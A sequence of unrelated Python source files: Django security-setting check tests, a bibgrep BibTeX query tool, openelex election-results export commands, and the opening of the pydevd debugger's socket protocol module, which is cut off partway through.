self.assertEqual(base.check_secret_key(None), [base.W009])
@override_settings(SECRET_KEY=None)
def test_none_secret_key(self):
self.assertEqual(base.check_secret_key(None), [base.W009])
@override_settings(SECRET_KEY=('abcdefghijklmnopqrstuvwx' * 2) + 'a')
def test_low_length_secret_key(self):
self.assertEqual(len(settings.SECRET_KEY), base.SECRET_KEY_MIN_LENGTH - 1)
self.assertEqual(base.check_secret_key(None), [base.W009])
@override_settings(SECRET_KEY='abcd' * 20)
def test_low_entropy_secret_key(self):
self.assertGreater(len(settings.SECRET_KEY), base.SECRET_KEY_MIN_LENGTH)
self.assertLess(len(set(settings.SECRET_KEY)), base.SECRET_KEY_MIN_UNIQUE_CHARACTERS)
self.assertEqual(base.check_secret_key(None), [base.W009])
class CheckDebugTest(SimpleTestCase):
@override_settings(DEBUG=True)
def test_debug_true(self):
"""
Warn if DEBUG is True.
"""
self.assertEqual(base.check_debug(None), [base.W018])
@override_settings(DEBUG=False)
def test_debug_false(self):
self.assertEqual(base.check_debug(None), [])
class CheckAllowedHostsTest(SimpleTestCase):
@override_settings(ALLOWED_HOSTS=[])
def test_allowed_hosts_empty(self):
self.assertEqual(base.check_allowed_hosts(None), [base.W020])
@override_settings(ALLOWED_HOSTS=['.example.com'])
def test_allowed_hosts_set(self):
self.assertEqual(base.check_allowed_hosts(None), [])
class CheckReferrerPolicyTest(SimpleTestCase):
@override_settings(
MIDDLEWARE=['django.middleware.security.SecurityMiddleware'],
SECURE_REFERRER_POLICY=None,
)
def test_no_referrer_policy(self):
self.assertEqual(base.check_referrer_policy(None), [base.W022])
@override_settings(MIDDLEWARE=[], SECURE_REFERRER_POLICY=None)
def test_no_referrer_policy_no_middleware(self):
"""
Don't warn if SECURE_REFERRER_POLICY is None and SecurityMiddleware
isn't in MIDDLEWARE.
"""
self.assertEqual(base.check_referrer_policy(None), [])
@override_settings(MIDDLEWARE=['django.middleware.security.SecurityMiddleware'])
def test_with_referrer_policy(self):
tests = (
'strict-origin',
'strict-origin,origin',
'strict-origin, origin',
['strict-origin', 'origin'],
('strict-origin', 'origin'),
)
for value in tests:
with self.subTest(value=value), override_settings(SECURE_REFERRER_POLICY=value):
self.assertEqual(base.check_referrer_policy(None), [])
@override_settings(
MIDDLEWARE=['django.middleware.security.SecurityMiddleware'],
SECURE_REFERRER_POLICY='invalid-value',
)
def test_with_invalid_referrer_policy(self):
self.assertEqual(base.check_referrer_policy(None), [base.E023])
|
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""bibgrep: Grep for bib(la)tex files.
To get all articles where the author contains 'Johnson' and the article is from
2010 or beyond:
>>> bibgrep --entry="article" --field="author~Johnson" --field="year>=2010"
The key, entry and field arguments take strings in a mini query language. For
keys and entries, the format is:
"[^][~]<key>"
"[^][~]<bibtype>"
where <key> is something like 'Johnson2002' and <bibtype> is 'article',
'inproceedings' etc. The caret denotes negation, and the tilde denotes
approximate matches instead of exact. For example, '~ceed' would match the
'proceedings', 'inproceedings' and 'mvproceedings' entries. The language for
fields is slightly more involved:
Field occurrence: "[^]<field_name>"
Field values : "[^]<field_name>(=|~)<value>"
Field range : "[^]<field_name>(<|>|<=|>=|=)<numeric_value>"
Field range : "[^]<numeric_value>(<|<=)<field_name>(<|<=)<numeric_value>"
Field range : "[^]<field_name>=<numeric_value>-<numeric_value>"
All punctuation has the same meaning as for keys and entries. Here are some
example queries:
Find entries that have a publisher field.
>>> bibgrep --field="publisher"
Find entries that do not have a note field.
>>> bibgrep --field="^note"
Find entries where the author is exactly 'D. A. Johnson' and the title contains
the word 'concurrency'.
>>> bibgrep --field="author=D. A. Johnson" --field="title~concurrency"
Find entries that were published in 2001 or later and whose volume is not
between 11 and 50.
>>> bibgrep --field="year>=2001" --field="^10<volume<=50"
Find entries that were published between 2000 and 2018 inclusive.
>>> bibgrep --field="year=2000-2018"
"""
import argparse
import bibpy
import bibpy.parser
import bibpy.tools
import itertools
import operator
import re
import os
import signal
import sys
__author__ = bibpy.__author__
__version__ = '0.1.0'
__license__ = bibpy.__license__
# TODO: How to combine predicates with '&&' and '||'?
# TODO: Make approximate matches use regexes
_DESCRIPTION = """Grep bib(la)tex files satisfying some predicates."""
_NAME_TO_OPERATOR = {
'<': operator.lt,
'>': operator.gt,
'<=': operator.le,
'>=': operator.ge,
'=': operator.eq
}
def sigterm_handler(signum, stack_frame):
"""Handle SIGTERM signal."""
sys.exit('bibgrep: Caught SIGTERM')
# Set up a signal handler for SIGTERM
signal.signal(signal.SIGTERM, sigterm_handler)
class BibgrepError(Exception):
"""Exception class for errors specific to bibgrep."""
pass
def approx_field_predicate(field, value, args):
"""Return a function that does an approximate match of a string."""
flags = re.I if args.ignore_case else 0
def _approx_match(entry):
field_value = getattr(entry, field, None)
if field_value is None:
return False
else:
return re.search(value, field_value, flags)
return _approx_match
def exact_field_predicate(field, value, args):
"""Return a function that does an exact match of a string."""
func = str.lower if args.ignore_case else str
def _exact_match(entry):
return func(getattr(entry, field, '')) == func(value)
return _exact_match
def field_occurrence_predicate(field, args):
"""Return a function that checks for the occurrence of a field."""
newfield = field.lower() if args.ignore_case else field
def _field_occurrence(entry):
return bool(getattr(entry, newfield, None))
return _field_occurrence
def negate(func):
"""Return a new function that negates the boolean result of func."""
def _negate(entry):
return not func(entry)
return _negate
def operator_from_string(op_name):
"""Return an operator function from its string equivalent."""
op = _NAME_TO_OPERATOR.get(op_name, None)
if op is None:
raise BibgrepError("Invalid operator '{0}'".format(op_name))
return op
def comparison_predicate(field, op_name, value):
"""Return a predicate function that compares a field to a value."""
operator = operator_from_string(op_name)
def _comparison_predicate(entry):
if not field:
return False
attr = getattr(entry, field, None)
try:
return attr and operator(int(attr), int(value))
except ValueError:
raise BibgrepError(
"Cannot compare '{0}' with '{1}'".format(value, attr)
)
return _comparison_predicate
def check_and_get_bounds(lower, upper):
"""Convert string bounds to integers and check if lower <= upper."""
try:
ilower = int(lower)
iupper = int(upper)
except ValueError:
raise BibgrepError('Bounds cannot be converted to integers')
if ilower > iupper:
raise BibgrepError('Lower bound must be <= upper bound')
return ilower, iupper
def interval_predicate(field, lower, upper):
"""Return a predicate function that checks if a field is in an interval."""
ilower, iupper = check_and_get_bounds(lower, upper)
def _interval_predicate(entry):
if not field:
return False
attr = getattr(entry, field, None)
try:
return attr and ilower <= int(attr) <= iupper
except ValueError:
raise BibgrepError(
"Cannot compare '{0}' with interval [{1}, {2}]"
.format(attr, lower, upper)
)
return _interval_predicate
def range_predicate(lower, op_name1, field, op_name2, upper):
"""Return a predicate function that checks if a field is in a range.
Example: '1 <= series < 10'
"""
ilower, iupper = check_and_get_bounds(lower, upper)
operator1 = operator_from_string(op_name1)
operator2 = operator_from_string(op_name2)
def _range_predicate(entry):
attr = getattr(entry, field, None)
try:
if attr:
iattr = int(attr)
return operator1(ilower, iattr) and operator2(iattr, iupper)
except ValueError:
raise BibgrepError(
"Cannot compare '{0}' with range {1} {2} field {3} {4}"
.format(attr, lower, op_name1, op_name2, upper)
)
return _range_predicate
def construct_key_entry_predicate(name, key, tokens, args):
"""Return a key/entry predicate to test if they are of given types."""
f = None
prefix_op = tokens[0] if tokens[0] else ''
if prefix_op and not set(prefix_op).issubset(set('^~')):
raise BibgrepError("Invalid field operator(s) '{0}'".format(tokens[0]))
if '~' in prefix_op:
f = approx_field_predicate(key, tokens[1], args)
else:
f = exact_field_predicate(key, tokens[1], args)
if '^' in prefix_op:
f = negate(f)
return f
def construct_field_predicate(name, key, tokens, args):
"""Return a predicate function from the parsed tokens of a query."""
predicate = None
if name == 'value':
if tokens[2] == '=':
predicate = exact_field_predicate(tokens[1], tokens[-1], args)
elif tokens[2] == '~':
predicate = approx_field_predicate(tokens[1], tokens[-1], args)
else:
raise BibgrepError(
"Invalid field operator '{0}'".format(tokens[1])
)
elif name == 'occurrence':
predicate = field_occurrence_predicate(tokens[1], args)
elif name == 'comparison':
predicate = comparison_predicate(*tokens[1:])
elif name == 'interval':
predicate = interval_predicate(*tokens[1:])
elif name == 'range':
predicate = range_predicate(*tokens[1:])
elif name == 'value':
predicate = comparison_predicate(*tokens[1:])
else:
raise BibgrepError('Invalid field query syntax')
neg = tokens[0] == '^'
return negate(predicate) if neg else predicate
def construct_predicates(values, predicate_func, key, pred_combiner, args):
"""Return a list of predicates on entries."""
# Parse and compose all predicates on values given on the command line
predicates = []
for value in values:
name, tokens = bibpy.parser.parse_query(value, key)
predicates.append(predicate_func(name, key, tokens, args))
return bibpy.tools.compose_predicates(predicates, pred_combiner)
def filter_entries(entries, predicates):
"""Filter entries based on predicates on entry type, key and fields."""
for entry in entries:
if any(pred(entry) for pred in predicates):
yield entry
def unique_entries(entries):
"""Remove duplicates from a set of entries."""
return [k for k, _ in itertools.groupby(entries)]
def process_file(source, unique, predicates):
"""Process a single bibliographic file."""
entries = bibpy.read_file(source).entries
if unique:
entries = unique_entries(entries)
return filter_entries(entries, predicates)
def main():
parser = argparse.ArgumentParser(prog='bibgrep', description=_DESCRIPTION)
parser.add_argument(
'-v', '--version',
action='version',
version=bibpy.tools.format_version(__version__)
)
parser.add_argument(
'-e', '--entry',
action='append',
help="Print entries matching an entry type (e.g. '@article')"
)
parser.add_argument(
'-k', '--key',
action='append',
dest='keys',
help='Print entries with exact or similar key. For example, '
"--key='article1 | article2' prints the entries with keys that "
'match either'
)
parser.add_argument(
'-f', '--field',
type=str,
action='append',
dest='fields',
help='Print entries that satisfy a list of field constraints'
)
parser.add_argument(
'-c', '--count',
action='store_true',
help='Only a count of selected lines is written to standard output. '
'If -n is given, prints a grand total'
)
parser.add_argument(
'-i', '--ignore-case',
action='store_true',
help='Perform case insensitive matching. By default, bibgrep is case '
' sensitive'
)
parser.add_argument(
'-r', '--recursive',
action='store_true',
help='Recursively search listed subdirectories'
)
parser.add_argument(
'-u', '--unique',
action='store_true',
help='Print only one entry if duplicates are encountered'
)
parser.add_argument(
'-n', '--no-filenames',
action='store_true',
help='Do not print filename headers before each entry when --count is '
'given. Overrides --abbreviate-filenames'
)
parser.add_argument(
'-a', '--abbreviate-filenames',
action='store_true',
help='Display only filename and not the full path when --count is '
' given'
)
args, rest = parser.parse_known_args()
key_predicate = bibpy.tools.always_false
entry_predicate = bibpy.tools.always_false
field_predicate = bibpy.tools.always_false
try:
if args.keys:
key_predicate = construct_predicates(
args.keys,
construct_key_entry_predicate,
'bibkey',
any,
args
)
if args.entry:
bibtypes = [
e for es in args.entry for e in map(str.strip, es.split(','))
]
entry_predicate = construct_predicates(
bibtypes,
construct_key_entry_predicate,
'bibtype',
any,
args
)
if args.fields:
field_predicate = construct_predicates(
args.fields,
construct_field_predicate,
'field',
any,
args
)
except (BibgrepError, bibpy.error.ParseException) as ex:
sys.exit('{0}'.format(ex))
if not args.keys and not args.entry and not args.fields:
# If no constraints are defined, all entries pass
key_predicate = bibpy.tools.always_true
entry_predicate = bibpy.tools.always_true
field_predicate = bibpy.tools.always_true
filtered_entries = []
total_count = 0
predicates = [entry_predicate, key_predicate, field_predicate]
try:
if not rest:
filtered_entries = process_file(sys.stdin, args.unique, predicates)
if args.count:
num_entries = len(list(filtered_entries))
total_count += num_entries
filtered_entries = []
else:
bib_files = bibpy.tools.iter_files(rest, '*.bib', args.recursive)
for filename in bib_files:
filtered_entries += list(
process_file(filename, args.unique, predicates)
)
if args.count:
if args.no_filenames:
total_count += len(filtered_entries)
else:
if args.abbreviate_filenames:
filename = os.path.basename(filename)
print('{0}:{1}'.format(
filename, len(filtered_entries))
)
filtered_entries = []
except (IOError, bibpy.error.ParseException, BibgrepError) as ex:
sys.exit('bibgrep: {0}'.format(ex))
except KeyboardInterrupt:
sys.exit(1)
if args.count and (args.no_filenames or not rest):
print(total_count)
if filtered_entries:
# Write all filtered entries to sys.stdout
print(bibpy.write_string(filtered_entries))
bibpy.tools.close_output_handles()
if __name__ == "__main__":
main()
|
|
from datetime import datetime
import json
import os.path
import re
import sys
import click
from openelex.api import elections as elec_api
from openelex.base.bake import Baker, RawBaker, reporting_levels_for_election
from openelex.base.publish import published_url
from openelex.lib import format_date, compose
from openelex.us import STATE_POSTALS
BASE_OPTIONS = [
click.option('--state', required=True, help="Two-letter state-abbreviation, e.g. NY"),
click.option('--fmt', help="Format of output files. Can be 'csv' or "
"'json'. Defaults is 'csv'.", default="csv"),
click.option('--outputdir', help="Directory where output files will be "
"written. Defaults to 'openelex/us/bakery'"),
click.option('--electiontype', help="Only bake results for election of "
"this type. Can be 'primary' or 'general'. Default is to bake results "
"for all types of elections"),
click.option('--level', help="Only bake results aggregated at this "
"reporting level. Values can be things like 'precinct' or 'county'. "
"Default is to bake results for all reporting levels."),
click.option('--raw', help="Bake raw results. Default is to bake "
"cleaned/standardized results", is_flag=True),
]
STATE_FILE_OPTIONS = list(BASE_OPTIONS)
STATE_FILE_OPTIONS.append(click.option('--datefilter', help="Date specified "
"in 'YYYY' or 'YYYY-MM-DD' format. Results will only be baked for "
"elections with a start date matching the date string"))
def base_options(f):
"""Decorator for default options"""
decorator_stack = compose(*BASE_OPTIONS)
return decorator_stack(f)
def state_file_options(f):
"""Decorator for options for the state_file command"""
decorator_stack = compose(*STATE_FILE_OPTIONS)
return decorator_stack(f)
@click.command(name='bake.state_file', help="Write election and candidate data "
"along with a manifest to structured files")
@state_file_options
def state_file(state, fmt='csv', outputdir=None, datefilter=None,
electiontype=None, level=None, raw=False):
"""
Writes election and candidate data, along with a manifest to structured
files.
Args:
state: Required. Postal code for a state. For example, "md".
fmt: Format of output files. This can be "csv" or "json". Defaults
to "csv".
outputdir: Directory where output files will be written. Defaults to
"openelections/us/bakery"
datefilter: Date specified in "YYYY" or "YYYY-MM-DD" used to filter
elections before they are baked.
electiontype: Election type. For example, general, primary, etc.
level: Reporting level of the election results. For example, "state",
"county", "precinct", etc. Value must be one of the options
specified in openelex.models.Result.REPORTING_LEVEL_CHOICES.
raw: Bake RawResult records instead of cleaned and transformed results.
"""
# TODO: Decide if datefilter should be required due to performance
# considerations.
# TODO: Implement filtering by office, district and party after the
# the data is standardized
# TODO: Filtering by election type and level
timestamp = datetime.now()
filter_kwargs = {}
if electiontype:
filter_kwargs['election_type'] = electiontype
if level:
filter_kwargs['reporting_level'] = level
if raw:
baker = RawBaker(state=state, datefilter=datefilter, **filter_kwargs)
else:
baker = Baker(state=state, datefilter=datefilter, **filter_kwargs)
baker.collect_items() \
.write(fmt, outputdir=outputdir, timestamp=timestamp) \
.write_manifest(outputdir=outputdir, timestamp=timestamp)
def get_elections(state, datefilter=None):
"""
Get all elections.
Args:
state: Required. Postal code for a state. For example, "md".
datefilter: Date specified in "YYYY" or "YYYYMMDD" used to filter
elections before they are baked.
Returns:
A list of dictionaries, each describing an election for the specified
state. The elections are sorted by date.
"""
elections = elec_api.find(state.upper())
if datefilter:
date_prefix = format_date(datefilter)
elections = [elec for elec in elections
if elec['start_date'].startswith(date_prefix)]
return sorted(elections, key=lambda x: x['start_date'])
def get_election_dates_types(state, datefilter=None):
"""Get all election dates and types for a state"""
return [(elec['start_date'].replace('-', ''), elec['race_type'])
for elec in get_elections(state, datefilter)]
ELECTION_FILE_OPTIONS = list(BASE_OPTIONS)
ELECTION_FILE_OPTIONS.append(click.option('--datefilter', help="Day of year, "
"specified in YYYYMMDD format. Results will only be baked for elections "
"with a start date matching the date string. Default is to bake results "
"for all elections."))
def election_file_options(f):
"""Decorator for options fo the election_file command"""
decorator_stack = compose(*ELECTION_FILE_OPTIONS)
return decorator_stack(f)
@click.command(name="bake.election_file", help="Write election and candidate "
"data with on election per file")
@election_file_options
def election_file(state, fmt='csv', outputdir=None, datefilter=None,
electiontype=None, level=None, raw=False):
"""
Write election and candidate data with one election per file.
"""
timestamp = datetime.now()
if raw:
baker_cls = RawBaker
else:
baker_cls = Baker
if datefilter is None or re.match( r'\d{4}', datefilter):
# No date specfied, so bake all elections or date filter
# represents a single year, so bake all elections for that year.
elections = get_election_dates_types(state, datefilter)
else:
# Date filter is for a day, grab that election specifically
if electiontype is None:
msg = "You must specify the election type when baking results for a single date."
sys.exit(msg)
elections = [(datefilter, electiontype)]
for election_date, election_type in elections:
if level is not None:
reporting_levels = [level]
else:
reporting_levels = reporting_levels_for_election(state, election_date,
election_type, raw)
for reporting_level in reporting_levels:
msg = "Baking {} level results for {} election on {}\n".format(
reporting_level, election_type, election_date)
sys.stdout.write(msg)
baker = baker_cls(state=state, datefilter=election_date,
election_type=election_type, reporting_level=reporting_level)
baker.collect_items()\
.write(fmt, outputdir=outputdir, timestamp=timestamp) \
.write_manifest(outputdir=outputdir, timestamp=timestamp)
def result_urls(election, raw=False):
urls = {}
state = election['state']['postal']
datefilter = election['start_date'].replace('-', '')
if raw:
baker_cls = RawBaker
else:
baker_cls = Baker
for level in reporting_levels_for_election(state, datefilter,
election['race_type'], raw):
filename = baker_cls.filename("csv", state=state, datefilter=datefilter,
election_type=election['race_type'], reporting_level=level)
urls[level] = published_url(state, filename, raw)
return urls
@click.command(name="bake.results_status_json", help="Output a JSON file "
"describing available results for each election")
@click.option('--state', help="Two-letter state-abbreviation, e.g. NY")
@click.option('--bakeall', is_flag=True, help='Bake metadata for all states '
'instead of the specified state')
@click.option('--outputdir', help='Create JSON files in this directory. '
'If baking a single file. output is sent to stdout.')
def results_status_json(state=None, bakeall=False, outputdir=None):
"""
Output a JSON file describing available results for each election.
The JSON is intended to be consumed by the results front-end website.
Args:
state (string): State abbreviation.
bakeall (boolean): If true, bake metadata for all states instead of the
specified state.
outputdir (string): If ``all`` is true, files will be created in this
directory. If baking a single file, output is sent to stdout.
"""
filename_tpl = "elections-{}.json"
if state:
# Bake metadata for a single state to stdout
print json.dumps(statuses_for_state(state))
sys.exit(0)
if not (bakeall and outputdir):
# Bad arguments. Output a message and exit.
msg = ("You must specify a state or the --bakeall flag and an "
"output directory")
sys.exit(msg)
# The use has specified the bakeall flag and an outputdir. Bake files for
# all states.
for state in STATE_POSTALS:
statuses = statuses_for_state(state)
output_path = os.path.join(outputdir,
filename_tpl.format(state.lower()))
with open(output_path, 'w') as f:
json.dump(statuses, f)
def statuses_for_state(state):
"""
Get metadata about available results for a state.
Args:
state (string): State abbreviation.
Returns:
A list of dictionaries where each dictionary represents information
about a single election.
"""
statuses = []
for election in get_elections(state):
status = {
'state': election['state']['postal'],
'start_date': election['start_date'],
'special': election['special'],
'year': datetime.strptime(election['start_date'], "%Y-%m-%d").year,
'race_type': election['race_type'],
'results': result_urls(election),
'results_raw': result_urls(election, raw=True),
'prez': election['prez'],
'senate': election['senate'],
'house': election['house'],
'gov': election['gov'],
'state_officers': election['state_officers'],
'state_leg': election['state_leg'],
'state_level_status': reporting_level_status(election, 'state'),
'county_level_status': reporting_level_status(election, 'county'),
'precinct_level_status': reporting_level_status(election,
'precinct'),
'cong_dist_level_status': reporting_level_status(election,
'cong_dist'),
'state_leg_level_status': reporting_level_status(election,
'state_leg'),
}
statuses.append(status)
return statuses
def reporting_level_status(election, reporting_level):
"""
Get the availability of results for a reporting level
This uses provisional logic to prepare the metadata for the website
launch for ONA 2014. It is designed to show the likely availability of
results with a minimum of backfilling the '{reporting_level}_level_status'.
As we progress, we should just use the value of the
'{reporting_level}_level_status' fields.
Args:
election (dict): Election dict as returned by ``get_elections()``
reporting_level (string): Reporting level ID. Should be "state",
"county", "precinct", "cong_dist" or "state_leg"
Returns:
Slug string representing the availability of results at this reporting
level. See hub.models.Election.LEVEL_STATUS_CHOICES in the dashboard
app (https://github.com/openelections/dashboard) for values.
"""
level_status = election[reporting_level + '_level_status']
levels = ('county', 'precinct', 'cong_dist', 'state_leg')
for level in levels:
# If any of the level status fields are set to a non-default value
# (None or an empty string). Just return this value.
if election[level + '_level_status']:
return level_status
# The level status has not been explicitly set. Look at the
# {reporting_level}_level field
if election[reporting_level + '_level']:
return 'yes'
else:
return 'no'
|
|
''' pydevd - a debugging daemon
This is the daemon you launch for python remote debugging.
Protocol:
each command has a format:
id\tsequence-num\ttext
id: protocol command number
sequence-num: each request has a sequence number. Sequence numbers
originating at the debugger are odd, sequence numbers originating
at the daemon are even. Every response uses the same sequence number
as the request.
payload: it is protocol dependent. When response is a complex structure, it
is returned as XML. Each attribute value is urlencoded, and then the whole
payload is urlencoded again to prevent stray characters corrupting protocol/xml encodings
Commands:
NUMBER NAME FROM* ARGUMENTS RESPONSE NOTE
100 series: program execution
101 RUN JAVA - -
102 LIST_THREADS JAVA RETURN with XML listing of all threads
103 THREAD_CREATE PYDB - XML with thread information
104 THREAD_KILL JAVA id (or * to exit) kills the thread
PYDB id nofies JAVA that thread was killed
105 THREAD_SUSPEND JAVA XML of the stack, suspends the thread
reason for suspension
PYDB id notifies JAVA that thread was suspended
106 CMD_THREAD_RUN JAVA id resume the thread
PYDB id \t reason notifies JAVA that thread was resumed
107 STEP_INTO JAVA thread_id
108 STEP_OVER JAVA thread_id
109 STEP_RETURN JAVA thread_id
110 GET_VARIABLE JAVA thread_id \t frame_id \t GET_VARIABLE with XML of var content
FRAME|GLOBAL \t attributes*
111 SET_BREAK JAVA file/line of the breakpoint
112 REMOVE_BREAK JAVA file/line of the return
113 CMD_EVALUATE_EXPRESSION JAVA expression result of evaluating the expression
114 CMD_GET_FRAME JAVA request for frame contents
115 CMD_EXEC_EXPRESSION JAVA
116 CMD_WRITE_TO_CONSOLE PYDB
117 CMD_CHANGE_VARIABLE
118 CMD_RUN_TO_LINE
119 CMD_RELOAD_CODE
120 CMD_GET_COMPLETIONS JAVA
500 series diagnostics/ok
501 VERSION either Version string (1.0) Currently just used at startup
502 RETURN either Depends on caller -
900 series: errors
901 ERROR either - This is reserved for unexpected errors.
* JAVA - remote debugger, the java end
* PYDB - pydevd, the python end
'''
from pydevd_constants import * #@UnusedWildImport
import sys
if USE_LIB_COPY:
import _pydev_time as time
import _pydev_threading as threading
try:
import _pydev_thread as thread
except ImportError:
import _thread as thread #Py3K changed it.
import _pydev_Queue as _queue
from _pydev_socket import socket
from _pydev_socket import AF_INET, SOCK_STREAM
from _pydev_socket import SHUT_RD, SHUT_WR
else:
import time
import threading
try:
import thread
except ImportError:
import _thread as thread #Py3K changed it.
try:
import Queue as _queue
except ImportError:
import queue as _queue
from socket import socket
from socket import AF_INET, SOCK_STREAM
from socket import SHUT_RD, SHUT_WR
try:
from urllib import quote
except:
from urllib.parse import quote #@Reimport @UnresolvedImport
import pydevd_vars
import pydev_log
import pydevd_tracing
import pydevd_vm_type
import pydevd_file_utils
import traceback
from pydevd_utils import *
from pydevd_utils import quote_smart as quote
from pydevd_tracing import GetExceptionTracebackStr
import pydevconsole
try:
_Thread_stop = threading.Thread._Thread__stop
except AttributeError:
_Thread_stop = threading.Thread._stop # _stop in Python 3
CMD_RUN = 101
CMD_LIST_THREADS = 102
CMD_THREAD_CREATE = 103
CMD_THREAD_KILL = 104
CMD_THREAD_SUSPEND = 105
CMD_THREAD_RUN = 106
CMD_STEP_INTO = 107
CMD_STEP_OVER = 108
CMD_STEP_RETURN = 109
CMD_GET_VARIABLE = 110
CMD_SET_BREAK = 111
CMD_REMOVE_BREAK = 112
CMD_EVALUATE_EXPRESSION = 113
CMD_GET_FRAME = 114
CMD_EXEC_EXPRESSION = 115
CMD_WRITE_TO_CONSOLE = 116
CMD_CHANGE_VARIABLE = 117
CMD_RUN_TO_LINE = 118
CMD_RELOAD_CODE = 119
CMD_GET_COMPLETIONS = 120
CMD_CONSOLE_EXEC = 121
CMD_ADD_EXCEPTION_BREAK = 122
CMD_REMOVE_EXCEPTION_BREAK = 123
CMD_LOAD_SOURCE = 124
CMD_ADD_DJANGO_EXCEPTION_BREAK = 125
CMD_REMOVE_DJANGO_EXCEPTION_BREAK = 126
CMD_SET_NEXT_STATEMENT = 127
CMD_SMART_STEP_INTO = 128
CMD_EXIT = 129
CMD_SIGNATURE_CALL_TRACE = 130
CMD_VERSION = 501
CMD_RETURN = 502
CMD_ERROR = 901
ID_TO_MEANING = {
'101':'CMD_RUN',
'102':'CMD_LIST_THREADS',
'103':'CMD_THREAD_CREATE',
'104':'CMD_THREAD_KILL',
'105':'CMD_THREAD_SUSPEND',
'106':'CMD_THREAD_RUN',
'107':'CMD_STEP_INTO',
'108':'CMD_STEP_OVER',
'109':'CMD_STEP_RETURN',
'110':'CMD_GET_VARIABLE',
'111':'CMD_SET_BREAK',
'112':'CMD_REMOVE_BREAK',
'113':'CMD_EVALUATE_EXPRESSION',
'114':'CMD_GET_FRAME',
'115':'CMD_EXEC_EXPRESSION',
'116':'CMD_WRITE_TO_CONSOLE',
'117':'CMD_CHANGE_VARIABLE',
'118':'CMD_RUN_TO_LINE',
'119':'CMD_RELOAD_CODE',
'120':'CMD_GET_COMPLETIONS',
'121':'CMD_CONSOLE_EXEC',
'122':'CMD_ADD_EXCEPTION_BREAK',
'123':'CMD_REMOVE_EXCEPTION_BREAK',
'124':'CMD_LOAD_SOURCE',
'125':'CMD_ADD_DJANGO_EXCEPTION_BREAK',
'126':'CMD_REMOVE_DJANGO_EXCEPTION_BREAK',
'127':'CMD_SET_NEXT_STATEMENT',
'128':'CMD_SMART_STEP_INTO',
'129': 'CMD_EXIT',
'130': 'CMD_SIGNATURE_CALL_TRACE',
'501':'CMD_VERSION',
'502':'CMD_RETURN',
'901':'CMD_ERROR',
}
MAX_IO_MSG_SIZE = 1000 #if the io is too big, we'll not send all (could make the debugger too non-responsive)
#this number can be changed if there's need to do so
VERSION_STRING = "@@BUILD_NUMBER@@"
#--------------------------------------------------------------------------------------------------- UTILITIES
#=======================================================================================================================
# PydevdLog
#=======================================================================================================================
def PydevdLog(level, *args):
""" levels are:
0 most serious warnings/errors
1 warnings/significant events
2 informational trace
"""
if level <= DebugInfoHolder.DEBUG_TRACE_LEVEL:
#yes, we can have errors printing if the console of the program has been finished (and we're still trying to print something)
try:
sys.stderr.write('%s\n' % (args,))
except:
pass
#=======================================================================================================================
# GlobalDebuggerHolder
#=======================================================================================================================
class GlobalDebuggerHolder:
'''
Holder for the global debugger.
'''
globalDbg = None
#=======================================================================================================================
# GetGlobalDebugger
#=======================================================================================================================
def GetGlobalDebugger():
return GlobalDebuggerHolder.globalDbg
#=======================================================================================================================
# SetGlobalDebugger
#=======================================================================================================================
def SetGlobalDebugger(dbg):
GlobalDebuggerHolder.globalDbg = dbg
#------------------------------------------------------------------- ACTUAL COMM
#=======================================================================================================================
# PyDBDaemonThread
#=======================================================================================================================
class PyDBDaemonThread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.setDaemon(True)
self.killReceived = False
self.dontTraceMe = True
def run(self):
if sys.platform.startswith("java"):
import org.python.core as PyCore #@UnresolvedImport
ss = PyCore.PySystemState()
# Note: Py.setSystemState() affects only the current thread.
PyCore.Py.setSystemState(ss)
self.OnRun()
def OnRun(self):
raise NotImplementedError('Should be reimplemented by: %s' % self.__class__)
def doKillPydevThread(self):
#that was not working very well because jython gave some socket errors
self.killReceived = True
def stop(self):
_Thread_stop(self)
def stopTrace(self):
if self.dontTraceMe:
pydevd_tracing.SetTrace(None) # no debugging on this thread
#=======================================================================================================================
# ReaderThread
#=======================================================================================================================
class ReaderThread(PyDBDaemonThread):
""" reader thread reads and dispatches commands in an infinite loop """
def __init__(self, sock):
PyDBDaemonThread.__init__(self)
self.sock = sock
self.setName("pydevd.Reader")
def doKillPydevThread(self):
#We must close the socket so that it doesn't stay halted there.
self.killReceived = True
try:
self.sock.shutdown(SHUT_RD) #shotdown the socket for read
except:
#just ignore that
pass
def OnRun(self):
self.stopTrace()
buffer = ""
try:
while not self.killReceived:
try:
r = self.sock.recv(1024)
except:
if not self.killReceived:
self.handleExcept()
return #Finished communication.
if IS_PY3K:
r = r.decode('utf-8')
buffer += r
if DebugInfoHolder.DEBUG_RECORD_SOCKET_READS:
pydev_log.debug('received >>%s<<\n' % (buffer,))
if len(buffer) == 0:
self.handleExcept()
break
while buffer.find('\n') != -1:
command, buffer = buffer.split('\n', 1)
pydev_log.debug('Received command: >>%s<<\n' % (command,))
args = command.split('\t', 2)
try:
self.processCommand(int(args[0]), int(args[1]), args[2])
except:
traceback.print_exc()
sys.stderr.write("Can't process net command: %s\n" % command)
sys.stderr.flush()
except:
traceback.print_exc()
self.handleExcept()
def handleExcept(self):
GlobalDebuggerHolder.globalDbg.FinishDebuggingSession()
def processCommand(self, cmd_id, seq, text):
GlobalDebuggerHolder.globalDbg.processNetCommand(cmd_id, seq, text)
#----------------------------------------------------------------------------------- SOCKET UTILITIES - WRITER
#=======================================================================================================================
# WriterThread
#=======================================================================================================================
class WriterThread(PyDBDaemonThread):
""" writer thread writes out the commands in an infinite loop """
def __init__(self, sock):
PyDBDaemonThread.__init__(self)
self.setDaemon(False) #writer isn't daemon to be able to deliver all messages after main thread terminated
self.sock = sock
self.setName("pydevd.Writer")
self.cmdQueue = _queue.Queue()
if pydevd_vm_type.GetVmType() == 'python':
self.timeout = 0
else:
self.timeout = 0.1
def addCommand(self, cmd):
""" cmd is NetCommand """
if not self.killReceived: #we don't take new data after everybody die
self.cmdQueue.put(cmd)
def OnRun(self):
""" just loop and write responses """
self.stopTrace()
try:
while True:
try:
try:
cmd = self.cmdQueue.get(1, 0.1)
except _queue.Empty:
if self.killReceived:
try:
self.sock.shutdown(SHUT_WR)
self.sock.close()
except:
pass
self.stop() #mark thread as stopped to unblock joined threads for sure (they can hang otherwise)
return #break if queue is empty and killReceived
else:
continue
except:
#PydevdLog(0, 'Finishing debug communication...(1)')
#when liberating the thread here, we could have errors because we were shutting down
#but the thread was still not liberated
return
out = cmd.getOutgoing()
if DebugInfoHolder.DEBUG_TRACE_LEVEL >= 1:
out_message = 'sending cmd: '
out_message += ID_TO_MEANING.get(out[:3], 'UNKNOWN')
out_message += ' '
out_message += out
try:
